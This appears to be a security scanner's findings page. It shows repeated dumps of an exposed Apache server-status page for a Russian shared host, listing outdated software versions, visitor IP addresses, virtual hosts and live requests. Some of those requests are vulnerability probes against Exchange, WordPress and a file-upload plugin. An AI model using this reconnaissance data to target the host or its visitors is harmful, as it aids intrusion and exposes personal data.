      32-2124-0/0/690758.
      0.0058700.00.0070453.33
      127.0.0.1185.240.102.32:8080
      Found on 2024-05-27 19:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb429bb661cd

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Sunday, 26-May-2024 19:38:15 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2091
      Parent Server MPM Generation: 2090
      Server uptime:  54 days 9 hours 57 minutes 16 seconds
      Server load: 7.62 7.55 8.31
      Total accesses: 94385478 - Total Traffic: 9426.2 GB
      CPU Usage: u91.18 s26.19 cu0 cs0 - .0025% CPU load
      20.1 requests/sec - 2.1 MB/second - 104.7 kB/request
      12 requests currently being processed, 5 idle workers
      __WWWWW_WW_W._WWW.........W.....................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2090129000/258/4071035_
      0.51010.027.74418926.34
      127.0.0.1
      
      1-2090177760/89/4007624_
      0.18060.04.76410729.28
      localhost185.240.102.32:8080GET /server-status HTTP/1.0
      
      2-2090166160/85/3950145W
      0.16000.04.26405141.63
      87.250.224.231vidook.ru:8080GET /NordNews HTTP/1.0
      
      3-2090150490/184/3889940W
      0.41000.09.12401561.28
      91.193.179.117cescorus.ru:8080GET /paint/enamel.html HTTP/1.0
      
      4-2090186080/0/3815440W
      0.281900.00.00393616.91
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      5-2090186450/15/3777316W
      0.021100.01.35388545.41
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      6-2090155320/63/3702295W
      0.135500.03.24382356.88
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      7-2090171750/108/3636632_
      0.2308190.020.44369992.13
      173.252.83.24cartin.ru:8080GET /minimoiki-huter/tovar/moika-huter-w165-ql HTTP/1.0
      
      8-2090180380/0/3558259W
      0.413620.00.00368551.16
      51.210.176.135xn----8sbavuvt5a8a.xn--p1ai:808GET /video/derbent%20(online-video-cutter.com).mp4 HTTP/1.0
      
      9-2090172490/98/3466280W
      0.19000.04.99357522.97
      185.54.49.166investorforever.ru:8080GET / HTTP/1.0
      
      10-2090180700/78/3408020_
      0.1601630.011.57347723.28
      85.215.114.81tune1.ru:8080GET /inputs.php HTTP/1.0
      
      11-2090180710/73/3311635W
      0.14000.04.21346505.56
      65.108.78.239sleep70.ru:8080GET /zhenshchinam/domashnyaya-odezhda-2c-pizhamy-2c-nochnye-sor
      
      12-2090-0/0/3205145.
      0.06500.00.00330934.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-2090172930/103/3069053_
      0.21000.06.55310816.94
      143.110.213.72trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      14-2090122700/294/2971012W
      0.70000.018.86304704.75
      143.110.213.72trustdefend.org:8080GET /server-status HTTP/1.0
      
      15-2090172940/99/2835241W
      0.21200.020.44293788.59
      213.180.203.143vidook.ru:8080GET /%D0%9F%D0%BE%D1%81%D0%BB%D0%B5%D0%B4%D0%BD%D0%B5%D0%B5+%D0
      
      16-2090190300/16/2698806W
      0.03300.00.20280126.50
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      17-2090-0/0/2545491.
      0.58300.00.00262327.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-2090-0/0/2374284.
      0.032740.00.00243396.23
      185.172.128.138computer-man.ru:8080GET //test/wp-includes/wlwmanifest.xml HTTP/1.0
      
      19-2090-0/0/2216796.
      0.0112300.00.00229284.38
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-2090-0/0/2030473.
      0.0310900.00.00210921.31
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-2090-0/0/1860514.
      0.154000.00.00193507.84
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-2090-0/0/1710674.
      0.0012000.00.00176155.61
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-2090-0/0/1536397.
      0.272900.00.00158977.48
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-2090-0/0/1338902.
      0.0112100.00.00141998.81
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-2090-0/0/1231326.
      0.078700.00.00123527.69
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-2090156420/197/1104987W
      0.44000.034.44113666.02
      175.27.212.157nagkab.ru:8080GET /?author=18 HTTP/1.0
      
      27-2090-0/0/1030785.
      0.0410600.00.00104980.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-2090-0/0/965266.
      0.0510500.00.00102438.69
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-2090-0/0/903636.
      0.0211400.00.0094213.38
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2090-0/0/805381.
      0.0046100.00.0082335.99
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2090-0/0/741843.
      0.4311700.00.0076945.98
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-2090-0/0/667102.
      0.0343800.00.0068728.13
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-2090-0/0/59751
      Found on 2024-05-26 16:38
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb424a5c012d

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Saturday, 25-May-2024 15:23:35 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2069
      Parent Server MPM Generation: 2068
      Server uptime:  53 days 5 hours 42 minutes 37 seconds
      Server load: 10.55 8.80 7.81
      Total accesses: 91818999 - Total Traffic: 9191.5 GB
      CPU Usage: u107.31 s23.83 cu0 cs0 - .00285% CPU load
      20 requests/sec - 2.0 MB/second - 105.0 kB/request
      14 requests currently being processed, 9 idle workers
      W.W_WW.W.WWW_WW_W__.__...WW__...................................
      ........W.......................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-206811930/56/3978781W
      0.12000.02.30410138.56
      92.242.36.2poezd-allegro-train.ru:8080GET /online_bilet_kypit_allegro HTTP/1.0
      
      1-2068-0/0/3918404.
      0.28000.00.00402798.66
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      2-2068296650/128/3862080W
      0.292900.021.12395797.09
      5.253.61.250sverkunov.ru:8080GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&s
      
      3-2068280280/241/3804785_
      0.580252860.018.46392797.13
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      4-2068311930/91/3729874W
      0.21000.014.75385367.53
      139.162.210.205trustdefend.org:8080GET /server-status HTTP/1.0
      
      5-2068280300/109/3691536W
      0.23000.041.36380146.78
      144.76.68.14khochu-prodat.ru:8080GET /link.php?link=5515&ver=full HTTP/1.0
      
      6-2068-0/0/3621459.
      0.38800.00.00374318.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-2068218940/373/3555942W
      0.86000.056.39362112.72
      5.255.231.34magic-school.net:8080GET /topic/3313-znachenie-desyatok-vseh-mastey-pri-gadanii-na-o
      
      8-2068-0/0/3483245.
      0.07300.00.00360649.50
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      9-2068240200/66/3388732W
      0.1427900.02.60349712.88
      5.255.231.129mebozon.ru:8080GET /index.php?route=extension/payment/yandex_money/market HTTP
      
      10-2068295380/183/3332283W
      0.401000.012.47339919.94
      66.249.64.9ustami-mladenca.ru:8080GET /index.php?route=feed/simple_sitemap HTTP/1.0
      
      11-206812380/47/3242192W
      0.08100.03.78339217.00
      142.93.43.189xn--72-glce2cbap.xn--p1ai:8080GET /product-category/lsjn/%D0%B4%D0%B5%D0%BA%D0%BE%D1%80%D0%B0
      
      12-206828130/29/3136211_
      0.0502070.02.65324363.47
      213.180.203.176na-rostelekome.ru:8080GET /----------------------------------------------------------
      
      13-2068317340/59/3005621W
      0.11500.03.82304961.19
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      14-2068298290/164/2909667W
      0.365700.06.48298254.31
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      15-2068321490/71/2778184_
      0.16000.023.13288299.41
      178.163.209.127porscheville.ru:8080GET /favicon.ico?v=wAvmL3qQ0W HTTP/1.0
      
      16-2068321980/63/2640007W
      0.145500.013.31274702.22
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      17-206830710/18/2493208_
      0.03010.00.59256763.11
      37.212.84.176shooting-ua.com:8080GET /Target/Target_rifle_50m.pdf HTTP/1.0
      
      18-206833070/15/2329068_
      0.02000.00.47238676.80
      139.162.210.205trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      19-2068-0/0/2171344.
      0.143000.00.00224755.66
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-206814300/87/1989486_
      0.18090.04.77207329.11
      95.108.213.219vidook.ru:8080GET /%D0%BB%D1%83%D1%87%D1%88%D0%B8%D0%B5+%D1%82%D1%8F%D0%B6%D0
      
      21-2068312320/109/1824443_
      0.24000.07.10189487.34
      195.182.129.98best-konstruktiv.ru:8080GET /metalloprokat/listy/ HTTP/1.0
      
      22-2068-0/0/1673668.
      0.042600.00.00172450.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-2068-0/0/1501746.
      0.015000.00.00155121.33
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-2068-0/0/1310317.
      0.533400.00.00139126.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-2068265250/251/1200752W
      0.551000.046.70120766.66
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      26-2068265650/235/1082453W
      0.53000.032.85110945.73
      3.12.120.215ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      27-206814650/65/1004104_
      0.13016000.02.92102692.24
      91.245.140.14yess24.ru:8080GET /product/mexican/ HTTP/1.0
      
      28-206814660/85/943669_
      0.20000.012.45100371.64
      213.180.203.246yess24.ru:8080GET /robots.txt HTTP/1.0
      
      29-2068-0/0/879432.
      0.005200.00.0091667.18
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2068-0/0/785781.
      0.0123600.00.0080897.84
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2068-0/0/724063.
      0.034210
      Found on 2024-05-25 12:23
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42cfc7c0ba

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Friday, 24-May-2024 14:10:16 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2040
      Parent Server MPM Generation: 2039
      Server uptime:  52 days 4 hours 29 minutes 18 seconds
      Server load: 10.14 9.83 9.24
      Total accesses: 89752151 - Total Traffic: 8984.5 GB
      CPU Usage: u102.99 s23.05 cu0 cs0 - .0028% CPU load
      19.9 requests/sec - 2.0 MB/second - 105.0 kB/request
      11 requests currently being processed, 10 idle workers
      _.__W_W_WW_..C............W...............W....._...............
      ...._....W._..WWW..._...........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2039231480/19/3891426_
      0.040790.00.55401308.59
      178.176.74.98itabs.by:8080GET / HTTP/1.0
      
      1-2039-0/0/3831856.
      0.018350.00.00394000.94
      149.154.161.249sudamerica.ru:8080GET /uruguay/pervyj-den-v-godu-s-temperaturoj-nizhe-nulya-pohol
      
      2-2039232810/27/3777087_
      0.04000.01.51386733.38
      3.147.73.51ustami-mladenca.ru:8080GET /catalog/detskie-krovatki/agat/ellipsefurniture/soohookids/
      
      3-2039233230/20/3718533_
      0.040340.00.46383651.38
      18.117.225.233ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      4-2039156620/201/3646676W
      0.442500.012.22377188.03
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      5-2039233250/22/3609260_
      0.04000.00.23371636.41
      157.230.19.140trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      6-2039233280/17/3541076W
      0.03400.00.25366366.75
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      7-2039233300/19/3478779_
      0.04000.00.59354607.75
      103.212.98.210185.240.102.32:8080GET /public/assets/plugins/jquery-file-upload/server/php/index.
      
      8-2039234020/19/3406513W
      0.03000.00.97352337.72
      213.180.203.130lab.ihaus.ru:8080GET /ispytaniya-elektrooborudovaniya/ HTTP/1.0
      
      9-2039234040/13/3314415W
      0.02000.01.71342048.28
      157.230.19.140trustdefend.org:8080GET /server-status HTTP/1.0
      
      10-2039234080/15/3259395_
      0.04070.00.74332685.06
      5.255.231.51vidook.ru:8080GET /%D0%BF%D1%81%D0%B8%D1%85%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D1%
      
      11-2039-0/0/3171375.
      0.42300.00.00330800.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-2039-0/0/3067472.
      0.01500.00.00316566.69
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-2039234141/13/2942169C
      0.02000.30.09298252.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      14-2039-0/0/2847192.
      0.01400.00.00291900.22
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-2039-0/0/2719378.
      0.01600.00.00282321.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-2039-0/0/2584397.
      0.01000.00.00269205.16
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-2039-0/0/2441237.
      0.025700.00.00251124.61
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-2039-0/0/2277936.
      0.053800.00.00233561.50
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-2039-0/0/2123225.
      0.016100.00.00219774.88
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-2039-0/0/1946384.
      0.85200.00.00203366.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-2039-0/0/1787143.
      0.082400.00.00185633.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-2039-0/0/1636963.
      0.007300.00.00168712.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-2039-0/0/1465809.
      0.045100.00.00151420.70
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-2039-0/0/1280827.
      0.4147560.00.00135943.55
      64.124.8.26mapsshop.ru:8080GET /vektornaja_karta_poselka_kazanka_688453_mif/data/pictures_
      
      25-2039-0/0/1174293.
      0.192800.00.00118083.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-2039197980/73/1058040W
      0.142500.02.25108553.66
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      27-2039-0/0/981023.
      0.035600.00.00100445.07
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-2039-0/0/922041.
      0.091500.00.0097968.38
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-2039-0/0/856539.
      0.054000.00.0089261.56
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2039-0/0/767330.
      0.036700.00.0078658.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2039-0/0/708676.
      0.377700.00.0073881.84
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-2039-0/0/636229.
      0.055800.00.0066124.22
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-2039-0/0/568888.
      0.05
      Found on 2024-05-24 11:10
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42d36832d3

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 23-May-2024 13:59:47 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 1998
      Parent Server MPM Generation: 1997
      Server uptime:  51 days 4 hours 18 minutes 49 seconds
      Server load: 8.16 8.48 9.12
      Total accesses: 87738177 - Total Traffic: 8770.0 GB
      CPU Usage: u74.53 s15.23 cu0 cs0 - .00203% CPU load
      19.8 requests/sec - 2.0 MB/second - 104.8 kB/request
      15 requests currently being processed, 6 idle workers
      WW__WWW_W.WWWWW_W_....W....W.W...._.............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-1997230180/8/3812349W
      0.02070.010.64391316.97
      95.26.76.224pmznn.ru:8080GET /video/VID_home3.mp4 HTTP/1.0
      
      1-1997230450/5/3751715W
      0.00000.00.01384400.00
      87.250.224.34vidook.ru:8080GET /stalker+ps5/XnqswNzVuqQ HTTP/1.0
      
      2-1997230460/3/3698262_
      0.00015860.00.26377129.06
      5.255.231.43magic-school.club:8080GET / HTTP/1.0
      
      3-1997209140/106/3643008_
      0.23010890.05.35374073.72
      95.26.76.224pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/3117/feedback/sche
      
      4-1997209510/41/3572736W
      0.09700.01.65368486.31
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      5-1997231590/4/3537164W
      0.00000.00.00363282.09
      89.22.235.136vtbmulticarta.ru:8080POST /wp-comments-post.php HTTP/1.0
      
      6-1997181030/36/3469480W
      0.0711500.01.95358228.19
      213.180.203.93mebozon.ru:8080GET /index.php?route=extension/payment/yandex_money/market HTTP
      
      7-1997194460/45/3407294_
      0.0801700.03.80346662.00
      185.240.102.28vst-plugin.ru:8080POST /wp-cron.php?doing_wp_cron=1716461987.38274097442626953125
      
      8-1997217150/70/3336118W
      0.15200.03.98343941.81
      78.107.252.54reportium.ru:8080POST /gw/ HTTP/1.0
      
      9-1997-0/0/3247277.
      0.20800.00.00334093.63
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      10-1997224930/19/3192223W
      0.03810.01.24324641.34
      93.124.119.198blue-issyk--kul.ru:8080GET /Film_sait_2_570.mp4 HTTP/1.0
      
      11-1997181710/36/3105629W
      0.098000.02.67323083.50
      213.151.8.160blue-issyk--kul.ru:8080GET /Film_sait_2_570.mp4 HTTP/1.0
      
      12-1997221220/42/3003838W
      0.08700.02.11309541.06
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      13-1997201720/131/2883331W
      0.28000.018.64291462.63
      5.255.231.112vidook.ru:8080GET /%D0%BF%D1%80%D0%B8%D0%B5%D0%BC+%D1%83+%D0%B3%D0%B8%D0%BD%D
      
      14-1997112590/75/2788789W
      0.17000.019.83285102.59
      37.215.45.39vst-plugin.ru:8080GET /kontakt-6/ HTTP/1.0
      
      15-1997221620/41/2663782_
      0.08010430.02.85275562.84
      95.26.76.224pmznn.ru:8080GET /wp-json/contact-form-7/v1/contact-forms/12171/feedback/sch
      
      16-1997221630/19/2532468W
      0.03000.00.44262617.50
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      17-1997138660/288/2389617_
      0.670860.032.18245081.47
      69.171.249.116mapsshop.ru:8080GET /vektornaja_karta_derevni_goleshevo_svg.html HTTP/1.0
      
      18-1997-0/0/2231682.
      0.399300.00.00228335.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-1997-0/0/2078667.
      0.197100.00.00214376.14
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-1997-0/0/1904719.
      0.0013300.00.00198516.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-1997-0/0/1750792.
      0.0910000.00.00181507.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-1997157720/137/1601734W
      0.321500.07.70164839.52
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      23-1997-0/0/1433128.
      0.0112700.00.00147918.61
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-1997-0/0/1253961.
      0.1311800.00.00132771.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-1997-0/0/1149459.
      0.2412400.00.00115555.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-1997-0/0/1035386.
      0.0112800.00.00105961.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-199793630/340/959006W
      0.763400.070.9798073.13
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      28-1997-0/0/902291.
      0.0211900.00.0095708.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-1997182580/201/837850W
      0.47000.018.0087106.71
      46.101.111.185trustdefend.org:8080GET /server-status HTTP/1.0
      
      30-1997-0/0/750838.
      0.146100.00.0076670.66
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-1997-0/0/690517.
      0.161600.00.0071489.45
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-1997-0/0/622442.
